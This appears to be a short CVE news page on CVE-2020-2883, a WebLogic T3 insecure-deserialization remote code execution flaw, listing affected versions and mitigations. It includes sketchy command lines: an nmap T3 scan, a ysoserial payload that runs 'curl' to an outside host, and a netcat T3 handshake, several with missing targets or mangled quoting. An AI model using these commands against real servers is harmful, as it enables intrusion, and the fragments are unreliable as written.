Oracle WebLogic Server, Remote Code Execution, CVE-2020-2883 (Critical)

Listen to this Post

How the mentioned CVE works:

CVE-2020-2883 is a critical vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. The flaw exists within the T3 protocol, a proprietary protocol used for communication between WebLogic servers and Java clients. The vulnerability is easily exploitable by an unauthenticated attacker with network access via T3. By sending a maliciously crafted T3 request, an attacker can trigger the deserialization of untrusted data. This insecure deserialization process allows the attacker to execute arbitrary code on the targeted server, completely compromising it. The attack does not require human interaction, meaning it can be automated and weaponized quickly. The vulnerability has a high attack complexity but a low privilege requirement, leading to a complete loss of confidentiality, integrity, and availability.
Platform: Oracle WebLogic Server
Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

Vulnerability : Insecure Deserialization

Severity: Critical

date: 2020-04-15

Prediction: 2020-07-14

What Undercode Say:

`$ nmap -p 7001 –script weblogic-t3-info `

`$ java -jar ysoserial.jar CommonsCollections1 ‘curl undercode.xyz/poc’ | base64`

`!/bin/bash`

` T3 protocol header`

`echo -e “t3 12.2.1\nAS:255\nHL:19\n\n” | nc -nv 7001`

How Exploit:

Malicious T3 request

Deserialization gadget chains

Arbitrary code execution

Protection from this CVE:

Apply CPU April 2020

Block T3 protocol

Network segmentation

Impact:

Remote Code Execution

Complete System Compromise

Unauthorized Data Access

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top